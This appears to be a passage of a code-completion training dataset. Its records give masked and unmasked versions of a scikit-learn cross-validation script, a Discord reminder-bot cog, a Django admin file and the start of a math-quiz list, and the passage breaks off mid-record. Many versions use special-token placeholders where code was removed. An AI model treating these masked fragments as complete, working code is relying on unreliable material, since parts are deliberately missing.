output)\nprint(ms.optimizeParametersKNeighborsClassifier(5, range(1, 5, 1)))\n",
"step-5": "import numpy as np\nimport pandas as pd\nimport datetime\nimport time\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import KFold\n\ndef make_submission(y_predict, user_id_test, movie_id_test, name=None, date=True):\n n_elements = len(y_predict)\n\n if name is None:\n name = 'submission'\n if date:\n name = name + '_{}'.format(time.strftime('%d-%m-%Y_%Hh%M'))\n\n with open(name + \".csv\", 'w') as f:\n f.write('\"USER_ID_MOVIE_ID\",\"PREDICTED_RATING\"\\n')\n for i in range(n_elements):\n if np.isnan(y_predict[i]):\n raise ValueError('NaN detected!')\n line = '{:0.0f},{:0.0f},{}\\n'.format(user_id_test[i],movie_id_test[i],y_predict[i])\n f.write(line)\n print(\"Submission file successfully written!\")\n\nclass ModelSelection:\n def __init__(self, user_data, movie_data, aggregated_data, train_data, output_train):\n self.train = train_data\n self.users = user_data\n self.aggregated = aggregated_data\n self.movies = movie_data\n self.output_train = output_train\n\n def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range):\n\n kf = KFold(n_splits=nb_fold)\n depth_n_errors = np.zeros((max_depth_range.__len__(), 2))\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][0] = depth\n i += 1\n #First round of cv\n for train_index, test_index in kf.split(self.aggregated):\n #Second round of cv\n i = 0\n for depth in max_depth_range:\n dt = DecisionTreeClassifier(max_depth=depth)\n scores = cross_val_score(dt, self.aggregated[train_index], self.output_train[train_index], cv=nb_fold, scoring='neg_mean_squared_error')\n depth_n_errors[i][1] += -scores.mean()\n i += 1\n\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][1] /= nb_fold\n i += 1\n\n best_depth = 0\n best_error = 5\n #Take the best model and cross validate it on the whole data\n for depth, error in depth_n_errors:\n if(error < best_error):\n best_error = error\n best_depth = depth\n\n #Recompute the error for this model on the whole data set\n dt = DecisionTreeClassifier(max_depth=best_depth)\n final_error = -cross_val_score(dt, self.aggregated, self.output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n\n return[best_depth, final_error.mean()]\n\n\n def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):\n\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n #First round of cv\n for train_index, test_index in kf.split(self.aggregated):\n #Second round of cv\n i = 0\n for k in k_range:\n dt = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index], self.output_train[train_index], cv=nb_fold, scoring='neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n\n best_k = 0\n best_error = 5\n #Take the best model and cross validate it on the whole data\n for k, error in k_n_errors:\n if(error < best_error):\n best_error = error\n best_k = k\n\n #Recompute the error for this model on the whole data set\n dt = KNeighborsClassifier(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n\n return[best_k, final_error.mean()]\n\n def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):\n\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n #First round of cv\n for train_index, test_index in kf.split(self.aggregated):\n #Second round of cv\n i = 0\n for k in k_range:\n dt = KNeighborsRegressor(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index], self.output_train[train_index], cv=nb_fold, scoring='neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n\n best_k = 0\n best_error = 5\n #Take the best model and cross validate it on the whole data\n for k, error in k_n_errors:\n if(error < best_error):\n best_error = error\n best_k = k\n\n #Recompute the error for this model on the whole data set\n dt = KNeighborsRegressor(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n\n return[best_k, final_error.mean()]\n\n\n\n\nusers = pd.read_csv(\"data/user_data_normalized_28-11-2016_01h32.csv\", delimiter=\",\")\nmovies = pd.read_csv(\"data/movie_data_normalized.csv\", delimiter=\",\")\ntrain = pd.read_csv(\"data/data_train.csv\", delimiter=\",\")\noutput = pd.read_csv(\"data/output_train.csv\", delimiter=\",\")[\"rating\"]\naggregated = pd.read_csv(\"data/agregated_data_28-11-2016_01h50.csv\", delimiter=\",\")\nms = ModelSelection(users.values, movies.values, aggregated.values, train.values, output)\n#print(ms.optimizeParametersDecisionTreeClassifier(5, range(2,3,1)))\nprint(ms.optimizeParametersKNeighborsClassifier(5, range(1,5,1)))\n#print(ms.optimizeParametersKNeighborsClassifier(5, range(5,10,1)))",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
class Reminders(commands.Cog):
def __init__(self, bot: Bot):
self.bot = bot
self.bot.loop.create_task(reminder_check(self.bot))
@commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)
async def reminder(self, ctx: Context):
if not ctx.invoked_subcommand:
await ctx.send('Subcommand not found.')
@reminder.command(help=
'Add a reminder, format "yyyy-mm-dd hh:mm" or "mm-dd hh:mm" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'
)
async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,
reminder_content: str):
now = datetime.now()
if not trigger_time:
await ctx.send('Incorrect time format, please see help text.')
elif trigger_time < now:
await ctx.send('That time is in the past.')
else:
display_name = get_name_string(ctx.message)
if user_is_irc_bot(ctx):
author_id = 1
irc_n = display_name
else:
author_id = get_database_user(ctx.author).id
irc_n = None
trig_at = trigger_time
trig = False
playback_ch_id = ctx.message.channel.id
new_reminder = Reminder(user_id=author_id, reminder_content=
reminder_content, trigger_at=trig_at, triggered=trig,
playback_channel_id=playback_ch_id, irc_name=irc_n)
db_session.add(new_reminder)
try:
db_session.commit()
await ctx.send(
f"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')})."
)
except (ScalarListException, SQLAlchemyError) as e:
db_session.rollback()
logging.exception(e)
await ctx.send(f'Something went wrong')
def setup(bot: Bot):
bot.add_cog(Reminders(bot))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
async def reminder_check(bot):
await bot.wait_until_ready()
while not bot.is_closed():
now = datetime.now()
reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=
now, Reminder.triggered == False).all()
for r in reminders:
if r.irc_name:
display_name = r.irc_name
else:
author_uid = r.user.user_uid
display_name = f'<@{author_uid}>'
channel = bot.get_channel(r.playback_channel_id)
message = f'Reminding {display_name}: ' + r.reminder_content
await channel.send(message)
r.triggered = True
db_session.commit()
await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)
class Reminders(commands.Cog):
def __init__(self, bot: Bot):
self.bot = bot
self.bot.loop.create_task(reminder_check(self.bot))
@commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)
async def reminder(self, ctx: Context):
if not ctx.invoked_subcommand:
await ctx.send('Subcommand not found.')
@reminder.command(help=
'Add a reminder, format "yyyy-mm-dd hh:mm" or "mm-dd hh:mm" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'
)
async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,
reminder_content: str):
now = datetime.now()
if not trigger_time:
await ctx.send('Incorrect time format, please see help text.')
elif trigger_time < now:
await ctx.send('That time is in the past.')
else:
display_name = get_name_string(ctx.message)
if user_is_irc_bot(ctx):
author_id = 1
irc_n = display_name
else:
author_id = get_database_user(ctx.author).id
irc_n = None
trig_at = trigger_time
trig = False
playback_ch_id = ctx.message.channel.id
new_reminder = Reminder(user_id=author_id, reminder_content=
reminder_content, trigger_at=trig_at, triggered=trig,
playback_channel_id=playback_ch_id, irc_name=irc_n)
db_session.add(new_reminder)
try:
db_session.commit()
await ctx.send(
f"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')})."
)
except (ScalarListException, SQLAlchemyError) as e:
db_session.rollback()
logging.exception(e)
await ctx.send(f'Something went wrong')
def setup(bot: Bot):
bot.add_cog(Reminders(bot))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
LONG_HELP_TEXT = """
Add reminders for yourself or remove the last one you added.
"""
SHORT_HELP_TEXT = 'Add or remove reminders.'
async def reminder_check(bot):
await bot.wait_until_ready()
while not bot.is_closed():
now = datetime.now()
reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=
now, Reminder.triggered == False).all()
for r in reminders:
if r.irc_name:
display_name = r.irc_name
else:
author_uid = r.user.user_uid
display_name = f'<@{author_uid}>'
channel = bot.get_channel(r.playback_channel_id)
message = f'Reminding {display_name}: ' + r.reminder_content
await channel.send(message)
r.triggered = True
db_session.commit()
await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)
class Reminders(commands.Cog):
def __init__(self, bot: Bot):
self.bot = bot
self.bot.loop.create_task(reminder_check(self.bot))
@commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)
async def reminder(self, ctx: Context):
if not ctx.invoked_subcommand:
await ctx.send('Subcommand not found.')
@reminder.command(help=
'Add a reminder, format "yyyy-mm-dd hh:mm" or "mm-dd hh:mm" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'
)
async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,
reminder_content: str):
now = datetime.now()
if not trigger_time:
await ctx.send('Incorrect time format, please see help text.')
elif trigger_time < now:
await ctx.send('That time is in the past.')
else:
display_name = get_name_string(ctx.message)
if user_is_irc_bot(ctx):
author_id = 1
irc_n = display_name
else:
author_id = get_database_user(ctx.author).id
irc_n = None
trig_at = trigger_time
trig = False
playback_ch_id = ctx.message.channel.id
new_reminder = Reminder(user_id=author_id, reminder_content=
reminder_content, trigger_at=trig_at, triggered=trig,
playback_channel_id=playback_ch_id, irc_name=irc_n)
db_session.add(new_reminder)
try:
db_session.commit()
await ctx.send(
f"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')})."
)
except (ScalarListException, SQLAlchemyError) as e:
db_session.rollback()
logging.exception(e)
await ctx.send(f'Something went wrong')
def setup(bot: Bot):
bot.add_cog(Reminders(bot))
<|reserved_special_token_1|>
import asyncio
import logging
from datetime import datetime
from discord.ext import commands
from discord.ext.commands import Bot, Context
from humanize import precisedelta
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy_utils import ScalarListException
from config import CONFIG
from models import Reminder, db_session
from utils import DateTimeConverter, get_database_user, get_database_user_from_id, get_name_string, user_is_irc_bot
LONG_HELP_TEXT = """
Add reminders for yourself or remove the last one you added.
"""
SHORT_HELP_TEXT = 'Add or remove reminders.'
async def reminder_check(bot):
await bot.wait_until_ready()
while not bot.is_closed():
now = datetime.now()
reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=
now, Reminder.triggered == False).all()
for r in reminders:
if r.irc_name:
display_name = r.irc_name
else:
author_uid = r.user.user_uid
display_name = f'<@{author_uid}>'
channel = bot.get_channel(r.playback_channel_id)
message = f'Reminding {display_name}: ' + r.reminder_content
await channel.send(message)
r.triggered = True
db_session.commit()
await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)
class Reminders(commands.Cog):
def __init__(self, bot: Bot):
self.bot = bot
self.bot.loop.create_task(reminder_check(self.bot))
@commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)
async def reminder(self, ctx: Context):
if not ctx.invoked_subcommand:
await ctx.send('Subcommand not found.')
@reminder.command(help=
'Add a reminder, format "yyyy-mm-dd hh:mm" or "mm-dd hh:mm" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'
)
async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,
reminder_content: str):
now = datetime.now()
if not trigger_time:
await ctx.send('Incorrect time format, please see help text.')
elif trigger_time < now:
await ctx.send('That time is in the past.')
else:
display_name = get_name_string(ctx.message)
if user_is_irc_bot(ctx):
author_id = 1
irc_n = display_name
else:
author_id = get_database_user(ctx.author).id
irc_n = None
trig_at = trigger_time
trig = False
playback_ch_id = ctx.message.channel.id
new_reminder = Reminder(user_id=author_id, reminder_content=
reminder_content, trigger_at=trig_at, triggered=trig,
playback_channel_id=playback_ch_id, irc_name=irc_n)
db_session.add(new_reminder)
try:
db_session.commit()
await ctx.send(
f"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')})."
)
except (ScalarListException, SQLAlchemyError) as e:
db_session.rollback()
logging.exception(e)
await ctx.send(f'Something went wrong')
def setup(bot: Bot):
bot.add_cog(Reminders(bot))
<|reserved_special_token_1|>
import asyncio
import logging
from datetime import datetime
from discord.ext import commands
from discord.ext.commands import Bot, Context
from humanize import precisedelta
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy_utils import ScalarListException
from config import CONFIG
from models import Reminder, db_session
from utils import (
DateTimeConverter,
get_database_user,
get_database_user_from_id,
get_name_string,
user_is_irc_bot,
)
LONG_HELP_TEXT = """
Add reminders for yourself or remove the last one you added.
"""
SHORT_HELP_TEXT = """Add or remove reminders."""
async def reminder_check(bot):
await bot.wait_until_ready()
while not bot.is_closed():
now = datetime.now()
reminders = (
db_session.query(Reminder)
.filter(Reminder.trigger_at <= now, Reminder.triggered == False) # noqa 712
.all()
)
for r in reminders:
if r.irc_name:
display_name = r.irc_name
else:
author_uid = r.user.user_uid
display_name = f"<@{author_uid}>"
channel = bot.get_channel(r.playback_channel_id)
message = f"Reminding {display_name}: " + r.reminder_content
await channel.send(message)
r.triggered = True
db_session.commit()
await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)
class Reminders(commands.Cog):
def __init__(self, bot: Bot):
self.bot = bot
self.bot.loop.create_task(reminder_check(self.bot))
@commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)
async def reminder(self, ctx: Context):
if not ctx.invoked_subcommand:
await ctx.send("Subcommand not found.")
@reminder.command(
help='Add a reminder, format "yyyy-mm-dd hh:mm" or "mm-dd hh:mm" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'
)
async def add(
self, ctx: Context, trigger_time: DateTimeConverter, *, reminder_content: str
):
now = datetime.now()
if not trigger_time:
await ctx.send("Incorrect time format, please see help text.")
elif trigger_time < now:
await ctx.send("That time is in the past.")
else:
# HURRAY the time is valid and not in the past, add the reminder
display_name = get_name_string(ctx.message)
# set the id to a random value if the author was the bridge bot, since we wont be using it anyways
# if ctx.message.clean_content.startswith("**<"): <---- FOR TESTING
if user_is_irc_bot(ctx):
author_id = 1
irc_n = display_name
else:
author_id = get_database_user(ctx.author).id
irc_n = None
trig_at = trigger_time
trig = False
playback_ch_id = ctx.message.channel.id
new_reminder = Reminder(
user_id=author_id,
reminder_content=reminder_content,
trigger_at=trig_at,
triggered=trig,
playback_channel_id=playback_ch_id,
irc_name=irc_n,
)
db_session.add(new_reminder)
try:
db_session.commit()
await ctx.send(
f"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')})."
)
except (ScalarListException, SQLAlchemyError) as e:
db_session.rollback()
logging.exception(e)
await ctx.send(f"Something went wrong")
def setup(bot: Bot):
bot.add_cog(Reminders(bot))
|
flexible
|
{
"blob_id": "0f54853901a26b66fe35106593ded6c92785b8db",
"index": 2682,
"step-1": "<mask token>\n\n\nclass Reminders(commands.Cog):\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.bot.loop.create_task(reminder_check(self.bot))\n\n @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)\n async def reminder(self, ctx: Context):\n if not ctx.invoked_subcommand:\n await ctx.send('Subcommand not found.')\n\n @reminder.command(help=\n 'Add a reminder, format \"yyyy-mm-dd hh:mm\" or \"mm-dd hh:mm\" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'\n )\n async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,\n reminder_content: str):\n now = datetime.now()\n if not trigger_time:\n await ctx.send('Incorrect time format, please see help text.')\n elif trigger_time < now:\n await ctx.send('That time is in the past.')\n else:\n display_name = get_name_string(ctx.message)\n if user_is_irc_bot(ctx):\n author_id = 1\n irc_n = display_name\n else:\n author_id = get_database_user(ctx.author).id\n irc_n = None\n trig_at = trigger_time\n trig = False\n playback_ch_id = ctx.message.channel.id\n new_reminder = Reminder(user_id=author_id, reminder_content=\n reminder_content, trigger_at=trig_at, triggered=trig,\n playback_channel_id=playback_ch_id, irc_name=irc_n)\n db_session.add(new_reminder)\n try:\n db_session.commit()\n await ctx.send(\n f\"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')}).\"\n )\n except (ScalarListException, SQLAlchemyError) as e:\n db_session.rollback()\n logging.exception(e)\n await ctx.send(f'Something went wrong')\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n",
"step-2": "<mask token>\n\n\nasync def reminder_check(bot):\n await bot.wait_until_ready()\n while not bot.is_closed():\n now = datetime.now()\n reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=\n now, Reminder.triggered == False).all()\n for r in reminders:\n if r.irc_name:\n display_name = r.irc_name\n else:\n author_uid = r.user.user_uid\n display_name = f'<@{author_uid}>'\n channel = bot.get_channel(r.playback_channel_id)\n message = f'Reminding {display_name}: ' + r.reminder_content\n await channel.send(message)\n r.triggered = True\n db_session.commit()\n await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)\n\n\nclass Reminders(commands.Cog):\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.bot.loop.create_task(reminder_check(self.bot))\n\n @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)\n async def reminder(self, ctx: Context):\n if not ctx.invoked_subcommand:\n await ctx.send('Subcommand not found.')\n\n @reminder.command(help=\n 'Add a reminder, format \"yyyy-mm-dd hh:mm\" or \"mm-dd hh:mm\" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'\n )\n async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,\n reminder_content: str):\n now = datetime.now()\n if not trigger_time:\n await ctx.send('Incorrect time format, please see help text.')\n elif trigger_time < now:\n await ctx.send('That time is in the past.')\n else:\n display_name = get_name_string(ctx.message)\n if user_is_irc_bot(ctx):\n author_id = 1\n irc_n = display_name\n else:\n author_id = get_database_user(ctx.author).id\n irc_n = None\n trig_at = trigger_time\n trig = False\n playback_ch_id = ctx.message.channel.id\n new_reminder = Reminder(user_id=author_id, reminder_content=\n reminder_content, trigger_at=trig_at, triggered=trig,\n playback_channel_id=playback_ch_id, irc_name=irc_n)\n db_session.add(new_reminder)\n try:\n db_session.commit()\n await ctx.send(\n f\"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')}).\"\n )\n except (ScalarListException, SQLAlchemyError) as e:\n db_session.rollback()\n logging.exception(e)\n await ctx.send(f'Something went wrong')\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n",
"step-3": "<mask token>\nLONG_HELP_TEXT = \"\"\"\nAdd reminders for yourself or remove the last one you added.\n\"\"\"\nSHORT_HELP_TEXT = 'Add or remove reminders.'\n\n\nasync def reminder_check(bot):\n await bot.wait_until_ready()\n while not bot.is_closed():\n now = datetime.now()\n reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=\n now, Reminder.triggered == False).all()\n for r in reminders:\n if r.irc_name:\n display_name = r.irc_name\n else:\n author_uid = r.user.user_uid\n display_name = f'<@{author_uid}>'\n channel = bot.get_channel(r.playback_channel_id)\n message = f'Reminding {display_name}: ' + r.reminder_content\n await channel.send(message)\n r.triggered = True\n db_session.commit()\n await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)\n\n\nclass Reminders(commands.Cog):\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.bot.loop.create_task(reminder_check(self.bot))\n\n @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)\n async def reminder(self, ctx: Context):\n if not ctx.invoked_subcommand:\n await ctx.send('Subcommand not found.')\n\n @reminder.command(help=\n 'Add a reminder, format \"yyyy-mm-dd hh:mm\" or \"mm-dd hh:mm\" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'\n )\n async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,\n reminder_content: str):\n now = datetime.now()\n if not trigger_time:\n await ctx.send('Incorrect time format, please see help text.')\n elif trigger_time < now:\n await ctx.send('That time is in the past.')\n else:\n display_name = get_name_string(ctx.message)\n if user_is_irc_bot(ctx):\n author_id = 1\n irc_n = display_name\n else:\n author_id = get_database_user(ctx.author).id\n irc_n = None\n trig_at = trigger_time\n trig = False\n playback_ch_id = ctx.message.channel.id\n new_reminder = Reminder(user_id=author_id, reminder_content=\n reminder_content, trigger_at=trig_at, triggered=trig,\n playback_channel_id=playback_ch_id, irc_name=irc_n)\n db_session.add(new_reminder)\n try:\n db_session.commit()\n await ctx.send(\n f\"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')}).\"\n )\n except (ScalarListException, SQLAlchemyError) as e:\n db_session.rollback()\n logging.exception(e)\n await ctx.send(f'Something went wrong')\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n",
"step-4": "import asyncio\nimport logging\nfrom datetime import datetime\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot, Context\nfrom humanize import precisedelta\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy_utils import ScalarListException\nfrom config import CONFIG\nfrom models import Reminder, db_session\nfrom utils import DateTimeConverter, get_database_user, get_database_user_from_id, get_name_string, user_is_irc_bot\nLONG_HELP_TEXT = \"\"\"\nAdd reminders for yourself or remove the last one you added.\n\"\"\"\nSHORT_HELP_TEXT = 'Add or remove reminders.'\n\n\nasync def reminder_check(bot):\n await bot.wait_until_ready()\n while not bot.is_closed():\n now = datetime.now()\n reminders = db_session.query(Reminder).filter(Reminder.trigger_at <=\n now, Reminder.triggered == False).all()\n for r in reminders:\n if r.irc_name:\n display_name = r.irc_name\n else:\n author_uid = r.user.user_uid\n display_name = f'<@{author_uid}>'\n channel = bot.get_channel(r.playback_channel_id)\n message = f'Reminding {display_name}: ' + r.reminder_content\n await channel.send(message)\n r.triggered = True\n db_session.commit()\n await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)\n\n\nclass Reminders(commands.Cog):\n\n def __init__(self, bot: Bot):\n self.bot = bot\n self.bot.loop.create_task(reminder_check(self.bot))\n\n @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)\n async def reminder(self, ctx: Context):\n if not ctx.invoked_subcommand:\n await ctx.send('Subcommand not found.')\n\n @reminder.command(help=\n 'Add a reminder, format \"yyyy-mm-dd hh:mm\" or \"mm-dd hh:mm\" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'\n )\n async def add(self, ctx: Context, trigger_time: DateTimeConverter, *,\n reminder_content: str):\n now = datetime.now()\n if not trigger_time:\n await ctx.send('Incorrect time format, please see help text.')\n elif trigger_time < now:\n await ctx.send('That time is in the past.')\n else:\n display_name = get_name_string(ctx.message)\n if user_is_irc_bot(ctx):\n author_id = 1\n irc_n = display_name\n else:\n author_id = get_database_user(ctx.author).id\n irc_n = None\n trig_at = trigger_time\n trig = False\n playback_ch_id = ctx.message.channel.id\n new_reminder = Reminder(user_id=author_id, reminder_content=\n reminder_content, trigger_at=trig_at, triggered=trig,\n playback_channel_id=playback_ch_id, irc_name=irc_n)\n db_session.add(new_reminder)\n try:\n db_session.commit()\n await ctx.send(\n f\"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')}).\"\n )\n except (ScalarListException, SQLAlchemyError) as e:\n db_session.rollback()\n logging.exception(e)\n await ctx.send(f'Something went wrong')\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n",
"step-5": "import asyncio\nimport logging\nfrom datetime import datetime\n\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot, Context\nfrom humanize import precisedelta\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy_utils import ScalarListException\n\nfrom config import CONFIG\nfrom models import Reminder, db_session\nfrom utils import (\n DateTimeConverter,\n get_database_user,\n get_database_user_from_id,\n get_name_string,\n user_is_irc_bot,\n)\n\nLONG_HELP_TEXT = \"\"\"\nAdd reminders for yourself or remove the last one you added.\n\"\"\"\nSHORT_HELP_TEXT = \"\"\"Add or remove reminders.\"\"\"\n\n\nasync def reminder_check(bot):\n await bot.wait_until_ready()\n while not bot.is_closed():\n now = datetime.now()\n reminders = (\n db_session.query(Reminder)\n .filter(Reminder.trigger_at <= now, Reminder.triggered == False) # noqa 712\n .all()\n )\n for r in reminders:\n if r.irc_name:\n display_name = r.irc_name\n else:\n author_uid = r.user.user_uid\n display_name = f\"<@{author_uid}>\"\n channel = bot.get_channel(r.playback_channel_id)\n message = f\"Reminding {display_name}: \" + r.reminder_content\n await channel.send(message)\n r.triggered = True\n db_session.commit()\n\n await asyncio.sleep(CONFIG.REMINDER_SEARCH_INTERVAL)\n\n\nclass Reminders(commands.Cog):\n def __init__(self, bot: Bot):\n self.bot = bot\n self.bot.loop.create_task(reminder_check(self.bot))\n\n @commands.group(help=LONG_HELP_TEXT, brief=SHORT_HELP_TEXT)\n async def reminder(self, ctx: Context):\n if not ctx.invoked_subcommand:\n await ctx.send(\"Subcommand not found.\")\n\n @reminder.command(\n help='Add a reminder, format \"yyyy-mm-dd hh:mm\" or \"mm-dd hh:mm\" or hh:mm:ss or hh:mm or xdxhxmxs or any ordered combination of the last format, then finally your reminder (rest of discord message).'\n )\n async def add(\n self, ctx: Context, trigger_time: DateTimeConverter, *, reminder_content: str\n ):\n now = datetime.now()\n if not trigger_time:\n await ctx.send(\"Incorrect time format, please see help text.\")\n elif trigger_time < now:\n await ctx.send(\"That time is in the past.\")\n else:\n # HURRAY the time is valid and not in the past, add the reminder\n display_name = get_name_string(ctx.message)\n\n # set the id to a random value if the author was the bridge bot, since we wont be using it anyways\n # if ctx.message.clean_content.startswith(\"**<\"): <---- FOR TESTING\n if user_is_irc_bot(ctx):\n author_id = 1\n irc_n = display_name\n else:\n author_id = get_database_user(ctx.author).id\n irc_n = None\n\n trig_at = trigger_time\n trig = False\n playback_ch_id = ctx.message.channel.id\n new_reminder = Reminder(\n user_id=author_id,\n reminder_content=reminder_content,\n trigger_at=trig_at,\n triggered=trig,\n playback_channel_id=playback_ch_id,\n irc_name=irc_n,\n )\n db_session.add(new_reminder)\n try:\n db_session.commit()\n await ctx.send(\n f\"Thanks {display_name}, I have saved your reminder (but please note that my granularity is set at {precisedelta(CONFIG.REMINDER_SEARCH_INTERVAL, minimum_unit='seconds')}).\"\n )\n except (ScalarListException, SQLAlchemyError) as e:\n db_session.rollback()\n logging.exception(e)\n await ctx.send(f\"Something went wrong\")\n\n\ndef setup(bot: Bot):\n bot.add_cog(Reminders(bot))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.contrib import admin
from Evaluacion.models import Evaluacion
admin.site.register(Evaluacion)
|
normal
|
{
"blob_id": "4ef4e302304ccf2dc92cdebe134e104af47aae20",
"index": 3795,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nadmin.site.register(Evaluacion)\n",
"step-3": "from django.contrib import admin\nfrom Evaluacion.models import Evaluacion\nadmin.site.register(Evaluacion)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
Easy = [['4 + 12 = ?', 16], ['45 -34 = ?', 11], ['27 + 12 -18 = ?', 21], [
'25 - 5 * 4 = ?', 5], ['18 + 45 / 5 - 3 * 2 = ?', 21], ['5! = ?', 120],
['3! + 2! = ?', 8], ['7 + 5! / 4! - 6 / 3 = ?', 10], [
'(25 + 5) / 6 * 4 = ?', 20], ['4(3+c)+c=c+4; c=?', -2], [
'\u200b√\u200b121 = ?', 11], ['x = √\u200b81 - √\u200b64; x= ?', 1], [
'x + y = 20; x - y = 4; y = ?', 8]]
Normal = [['8(10−k)=2k; k = ?', 8], ['−4n−8=4(−3n+2); n=?', 2], [
'4(3+c)+c=c+4; c=?', -2], ['\u200b√\u200b121 = ?', 11], [
